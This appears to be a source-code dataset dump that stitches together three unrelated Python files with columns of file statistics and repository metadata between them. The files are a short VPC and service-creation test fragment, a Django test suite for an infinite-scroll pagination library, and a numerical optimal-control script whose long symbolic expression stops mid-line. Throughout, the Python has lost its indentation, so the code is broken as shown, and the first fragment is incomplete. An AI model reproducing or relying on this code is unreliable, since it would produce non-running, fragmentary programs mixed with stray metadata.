class TestVpcs(TestCase):
def setUp(self):
self.project_id = "7ae5a60714014778baddea703b85cd93"
self.vpc_id = 448
def test_get_vpcs_from_db(self):
result = handler.get_vpc_net_cidrs(self.vpc_id)
class TestServiceCreate(TestCase):
def setUp(self):
self.project_id = "7ae5a60714014778baddea703b85cd93"
self.request_client = RequestClient(endpoint=env_config.service_volume_endpoint, api_key="")
def service_create(self):
self.request_client = RequestClient(endpoint=env_config.service_volume_endpoint, api_key="")
| 42.80593
| 120
| 0.660286
| 1,845
| 15,881
| 5.344715
| 0.100813
| 0.113782
| 0.087618
| 0.120475
| 0.850624
| 0.82953
| 0.809553
| 0.804482
| 0.766454
| 0.706318
| 0
| 0.045718
| 0.219067
| 15,881
| 370
| 121
| 42.921622
| 0.749395
| 0.054719
| 0
| 0.598566
| 0
| 0
| 0.136886
| 0.034989
| 0
| 0
| 0
| 0
| 0.103943
| 1
| 0.132616
| false
| 0.082437
| 0.02509
| 0
| 0.175627
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
a668a818ffc2f103adb24e9a69ee73d604fa5054
| 15,963
|
py
|
Python
|
tests/tests.py
|
nitely/django-infinite-scroll-pagination
|
c4a9b57539e6daaef95fb0f184b2bab906f15b96
|
[
"MIT"
] | 89
|
2015-01-08T14:07:17.000Z
|
2022-03-08T14:41:20.000Z
|
tests/tests.py
|
nitely/django-infinite-scroll-pagination
|
c4a9b57539e6daaef95fb0f184b2bab906f15b96
|
[
"MIT"
] | 10
|
2016-11-14T02:12:47.000Z
|
2022-01-28T01:56:27.000Z
|
tests/tests.py
|
nitely/django-infinite-scroll-pagination
|
c4a9b57539e6daaef95fb0f184b2bab906f15b96
|
[
"MIT"
] | 11
|
2015-02-19T17:35:05.000Z
|
2020-11-26T08:09:16.000Z
|
#-*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
import json
import pytz
from django.test import TestCase, override_settings
from django.urls import reverse
from django.utils import timezone
from .models import Article
from infinite_scroll_pagination.paginator import SeekPaginator
from infinite_scroll_pagination import paginator as inf_paginator
from infinite_scroll_pagination import serializers
class PaginatorTest(TestCase):
def setUp(self):
date = timezone.now()
for i in range(25):
seconds = datetime.timedelta(seconds=i)
Article.objects.create(title="%s" % i, date=date, date_unique=date + seconds)
def test_paginator_prev_desc(self):
articles = Article.objects.all().order_by("-date_unique")
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="-date_unique")
page_2 = paginator.page(
value=list(articles)[20].date_unique,
move_to=inf_paginator.PREV_PAGE)
self.assertListEqual(list(page_2), list(articles[10:20]))
page_1 = paginator.page(
value=page_2[0].date_unique,
move_to=inf_paginator.PREV_PAGE)
self.assertListEqual(list(page_1), list(articles[:10]))
def test_paginator_next_desc(self):
articles = Article.objects.all().order_by("-date_unique")
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="-date_unique")
page_1 = paginator.page(value=None)
self.assertListEqual(list(page_1), list(articles[:10]))
page_2 = paginator.page(value=page_1[-1].date_unique)
self.assertListEqual(list(page_2), list(articles[10:20]))
page_3 = paginator.page(value=page_2[-1].date_unique)
self.assertListEqual(list(page_3), list(articles[20:]))
def test_paginator_prev_asc(self):
articles = Article.objects.all().order_by("date_unique")
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="date_unique")
page_2 = paginator.page(
value=list(articles)[20].date_unique,
move_to=inf_paginator.PREV_PAGE)
self.assertListEqual(list(page_2), list(articles[10:20]))
page_1 = paginator.page(
value=page_2[0].date_unique,
move_to=inf_paginator.PREV_PAGE)
self.assertListEqual(list(page_1), list(articles[:10]))
def test_paginator_next_asc(self):
articles = Article.objects.all().order_by("date_unique")
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="date_unique")
page_1 = paginator.page(value=None)
self.assertListEqual(list(page_1), list(articles[:10]))
page_2 = paginator.page(value=page_1[-1].date_unique)
self.assertListEqual(list(page_2), list(articles[10:20]))
page_3 = paginator.page(value=page_2[-1].date_unique)
self.assertListEqual(list(page_3), list(articles[20:]))
def test_paginator_prev_desc_non_unique(self):
articles = Article.objects.all().order_by("-date", "-pk")
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="-date")
page_2 = paginator.page(
value=list(articles)[20].date,
pk=list(articles)[20].pk,
move_to=inf_paginator.PREV_PAGE)
self.assertListEqual(list(page_2), list(articles[10:20]))
page_1 = paginator.page(
value=page_2[0].date,
pk=page_2[0].pk,
move_to=inf_paginator.PREV_PAGE)
self.assertListEqual(list(page_1), list(articles[:10]))
def test_paginator_next_desc_non_unique(self):
articles = Article.objects.all().order_by("-date", "-pk")
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="-date")
page_1 = paginator.page(value=None, pk=None)
self.assertListEqual(list(page_1), list(articles[:10]))
page_2 = paginator.page(value=page_1[-1].date, pk=page_1[-1].pk)
self.assertListEqual(list(page_2), list(articles[10:20]))
page_3 = paginator.page(value=page_2[-1].date, pk=page_2[-1].pk)
self.assertListEqual(list(page_3), list(articles[20:]))
def test_paginator_prev_asc_non_unique(self):
articles = Article.objects.all().order_by("-date", "-pk")
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="-date")
page_2 = paginator.page(
value=list(articles)[20].date,
pk=list(articles)[20].pk,
move_to=inf_paginator.PREV_PAGE)
self.assertListEqual(list(page_2), list(articles[10:20]))
page_1 = paginator.page(
value=page_2[0].date,
pk=page_2[0].pk,
move_to=inf_paginator.PREV_PAGE)
self.assertListEqual(list(page_1), list(articles[:10]))
def test_paginator_next_asc_non_unique(self):
articles = Article.objects.all().order_by("-date", "-pk")
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="-date")
page_1 = paginator.page(value=None, pk=None)
self.assertListEqual(list(page_1), list(articles[:10]))
page_2 = paginator.page(value=page_1[-1].date, pk=page_1[-1].pk)
self.assertListEqual(list(page_2), list(articles[10:20]))
page_3 = paginator.page(value=page_2[-1].date, pk=page_2[-1].pk)
self.assertListEqual(list(page_3), list(articles[20:]))
def test_reverse_date_for_pk(self):
"""
When the date increment does not match the pk increment,
we should still get the right results.
"""
Article.objects.all().delete()
self.assertFalse(list(Article.objects.all()))
# asc order date and desc order pk
date = timezone.now()
dates = reversed(
[date + datetime.timedelta(seconds=seconds)
for seconds in range(25)])
for i, d in enumerate(dates):
Article.objects.create(title="%s" % i, date=date, date_unique=d)
articles = Article.objects.all().order_by("-date_unique")
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="-date_unique")
page_1 = paginator.page(value=None)
self.assertListEqual(list(page_1), list(articles[:10]))
page_2 = paginator.page(value=page_1[-1].date_unique, pk=page_1[-1].pk)
self.assertListEqual(list(page_2), list(articles[10:20]))
page_3 = paginator.page(value=page_2[-1].date_unique, pk=page_2[-1].pk)
self.assertListEqual(list(page_3), list(articles[20:]))
class PageTest(TestCase):
def setUp(self):
date = timezone.now()
for i in range(25):
seconds = datetime.timedelta(seconds=i)
Article.objects.create(title="%s" % i, date=date, date_unique=date + seconds)
def test_next_page(self):
articles = Article.objects.all().order_by("date_unique")
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="date_unique")
page = paginator.page(value=None)
self.assertListEqual(list(page), list(articles[:10]))
page = paginator.page(**page.next_page())
self.assertListEqual(list(page), list(articles[10:20]))
page = paginator.page(**page.next_page())
self.assertListEqual(list(page), list(articles[20:]))
def test_prev_page(self):
articles = Article.objects.all().order_by("-date_unique")
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="-date_unique")
page = paginator.page(
value=list(articles)[20].date_unique,
move_to=inf_paginator.PREV_PAGE)
self.assertListEqual(list(page), list(articles[10:20]))
page = paginator.page(
move_to=inf_paginator.PREV_PAGE,
**page.prev_page())
self.assertListEqual(list(page), list(articles[:10]))
def test_next_objects_left(self):
articles = Article.objects.all().order_by("-date_unique")
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="-date_unique")
page = paginator.page(value=None)
self.assertEqual(
page.next_objects_left(),
len(articles[paginator.per_page:]))
# last page
page_last = paginator.page(
value=list(articles)[-paginator.per_page].date_unique)
self.assertEqual(page_last.next_objects_left(), 0)
def test_prev_objects_left(self):
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="-date_unique")
page = paginator.page(value=None)
self.assertEqual(page.prev_objects_left(), 0)
page = paginator.page(**page.next_page())
self.assertEqual(page.prev_objects_left(), paginator.per_page)
page = paginator.page(**page.next_page())
self.assertEqual(page.prev_objects_left(), paginator.per_page * 2)
def test_next_pages_left(self):
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="-date_unique")
page = paginator.page(value=None)
self.assertEqual(page.next_pages_left(), 2)
page = paginator.page(**page.next_page())
self.assertEqual(page.next_pages_left(), 1)
page = paginator.page(**page.next_page())
self.assertEqual(page.next_pages_left(), 0)
def test_prev_pages_left(self):
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="-date_unique")
page = paginator.page(value=None)
self.assertEqual(page.prev_pages_left(), 0)
page = paginator.page(**page.next_page())
self.assertEqual(page.prev_pages_left(), 1)
page = paginator.page(**page.next_page())
self.assertEqual(page.prev_pages_left(), 2)
def test_has_next_page(self):
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="date_unique")
page = paginator.page(value=None)
self.assertTrue(page.has_next())
page = paginator.page(**page.next_page())
self.assertTrue(page.has_next())
page = paginator.page(**page.next_page())
self.assertFalse(page.has_next())
def test_has_prev_page(self):
articles = Article.objects.all().order_by("-date_unique")
paginator = SeekPaginator(
Article.objects.all(), per_page=10, lookup_field="-date_unique")
page = paginator.page(
value=list(articles)[20].date_unique,
move_to=inf_paginator.PREV_PAGE)
self.assertTrue(page.has_previous())
page = paginator.page(
move_to=inf_paginator.PREV_PAGE,
**page.prev_page())
self.assertFalse(page.has_previous())
def test_empty_first_page(self):
paginator = SeekPaginator(
Article.objects.none(), per_page=10, lookup_field="-date_unique")
page = paginator.page(value=None)
self.assertFalse(list(page))
self.assertFalse(page.has_next())
self.assertFalse(page.has_previous())
self.assertEqual(page.next_objects_left(), 0)
self.assertEqual(page.prev_objects_left(), 0)
self.assertEqual(page.next_pages_left(), 0)
self.assertEqual(page.next_page(), {})
self.assertEqual(page.prev_page(), {})
class SerializerTest(TestCase):
@override_settings(USE_TZ=True)
def test_page_key_to_page_key(self):
tz = pytz.timezone('UTC')
dt = tz.localize(datetime.datetime(
year=2012, month=3, day=9, hour=22,
minute=30, second=40, microsecond=123123))
key = serializers.to_page_key(value=dt, pk=1)
self.assertEqual(key, '1331332240.123123-1')
page_dt, page_key = serializers.page_key(key)
self.assertEqual(page_dt, dt)
self.assertEqual(page_key, '1')
@override_settings(USE_TZ=True, TIME_ZONE='America/Argentina/Buenos_Aires')
def test_page_key_to_page_key_buenos_aires(self):
tz = pytz.timezone('UTC')
dt = tz.localize(datetime.datetime(
year=2012, month=3, day=9, hour=22,
minute=30, second=40, microsecond=123123))
bs_as = pytz.timezone('America/Argentina/Buenos_Aires')
key = serializers.to_page_key(value=dt.astimezone(bs_as), pk=1)
self.assertEqual(key, '1331332240.123123-1')
page_dt, page_key = serializers.page_key(key)
self.assertEqual(page_dt, dt)
self.assertEqual(page_key, '1')
@override_settings(USE_TZ=True)
def test_page_key_to_page_key_tight_api(self):
tz = pytz.timezone('UTC')
dt = tz.localize(datetime.datetime(
year=2012, month=3, day=9, hour=22,
minute=30, second=40, microsecond=123123))
self.assertEqual(
serializers.to_page_key(
*serializers.page_key(
serializers.to_page_key(value=dt, pk=1))),
'1331332240.123123-1')
self.assertEqual(
serializers.to_page_key(
*serializers.page_key(
serializers.to_page_key(value=None, pk=None))),
'')
@override_settings(USE_TZ=True)
def test_to_page_key_microseconds(self):
tz = pytz.timezone('UTC')
dt = tz.localize(datetime.datetime(
year=2012, month=3, day=9, hour=22,
minute=30, second=40, microsecond=0))
self.assertEqual(
serializers.to_page_key(value=dt, pk=1),
'1331332240.000000-1')
@override_settings(USE_TZ=True)
def test_page_key_microseconds(self):
tz = pytz.timezone('UTC')
dt = tz.localize(datetime.datetime(
year=2012, month=3, day=9, hour=22,
minute=30, second=40, microsecond=0))
self.assertEqual(
serializers.page_key(
serializers.to_page_key(value=dt, pk=1)),
(dt, '1'))
@override_settings(USE_TZ=False)
def test_page_key_to_page_key_naive(self):
# The datetime naive version should work too,
# but we can't compare the string key because
# it vary depending on the platform
dt = datetime.datetime(
year=2012, month=3, day=9, hour=22,
minute=30, second=40, microsecond=123123)
self.assertEqual(
serializers.page_key(
serializers.to_page_key(
*serializers.page_key(
serializers.to_page_key(value=dt, pk=1)))),
(dt, '1'))
class PaginatorViewTest(TestCase):
def setUp(self):
date = timezone.now()
for i in range(25):
seconds = datetime.timedelta(seconds=i)
Article.objects.create(title="%s" % i, date=date, date_unique=date + seconds)
def test_first_page(self):
response = self.client.get(
reverse('pagination-ajax'),
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
res = json.loads(response.content.decode('utf-8'))
articles = Article.objects.all().order_by("-date", "-pk")
self.assertEqual(
res['articles'],
[{'title': a.title, } for a in articles[:20]])
@override_settings(USE_TZ=False)
def test_last_page(self):
articles = list(Article.objects.all().order_by("-date", "-pk"))
art = articles[20]
page = serializers.to_page_key(value=art.date, pk=art.pk)
response = self.client.get(
reverse('pagination-ajax') + '?p={}'.format(page),
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
res = json.loads(response.content.decode('utf-8'))
self.assertEqual(
res['articles'],
[{'title': a.title} for a in articles[21:]])
| 41.897638
| 89
| 0.634968
| 2,021
| 15,963
| 4.806531
| 0.085601
| 0.060222
| 0.059502
| 0.077826
| 0.876673
| 0.850731
| 0.832716
| 0.79092
| 0.784641
| 0.773008
| 0
| 0.034751
| 0.233853
| 15,963
| 380
| 90
| 42.007895
| 0.759526
| 0.017666
| 0
| 0.721362
| 0
| 0
| 0.038289
| 0.003835
| 0
| 0
| 0
| 0
| 0.204334
| 1
| 0.089783
| false
| 0
| 0.034056
| 0
| 0.136223
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6b9969a4e5e3345fa3e9db7cd6f3886dc190cc9
| 71,701
|
py
|
Python
|
examples/Nolan/AFRL/Carts/SpeedTest9.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | 1
|
2019-03-26T03:00:03.000Z
|
2019-03-26T03:00:03.000Z
|
examples/Nolan/AFRL/Carts/SpeedTest9.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | null | null | null |
examples/Nolan/AFRL/Carts/SpeedTest9.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | 1
|
2019-07-14T22:53:52.000Z
|
2019-07-14T22:53:52.000Z
|
import numpy as np
from beluga.utils.math import *
from beluga.utils.tictoc import *
from numpy import pi
tf = 1
Dt = 0.1
sigv = 0.1
sigw = 0.1
sigr = 0.1
w = 3.1415/2
xb = 5
yb = 5
u_max = 0.1
v = 30
x_n = 100
y_n = 100
theta_n = 0.1
p11_n = 1
p12_n = 1
p13_n = 1
p22_n = 1
p23_n = 1
p33_n = 1
lamX_N = 50
lamY_N = -100
lamTHETA_N = 2
lamP11_N = 1
lamP12_N = 1
lamP13_N = 1
lamP22_N = 1
lamP23_N = 1
lamP33_N = 1
x_s = 1
y_s = 1
theta_s = 1
p11_s = 1e-3
p12_s = 1e-3
p13_s = 1e-3
p22_s = 1e-1
p23_s = 1e-2
p33_s = 1e-3
ep = 5
tic()
for i in range(1000):
fx = np.array([
(tf)*(-lamP11_N*(p11_n*p11_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p11_n*p11_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_n*p11_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(p12_n*p12_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(p12_n*p12_s*x_s*(x_n*x_s - xb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*x_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s - lamP33_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p13_n*p13_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p13_n*p13_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s 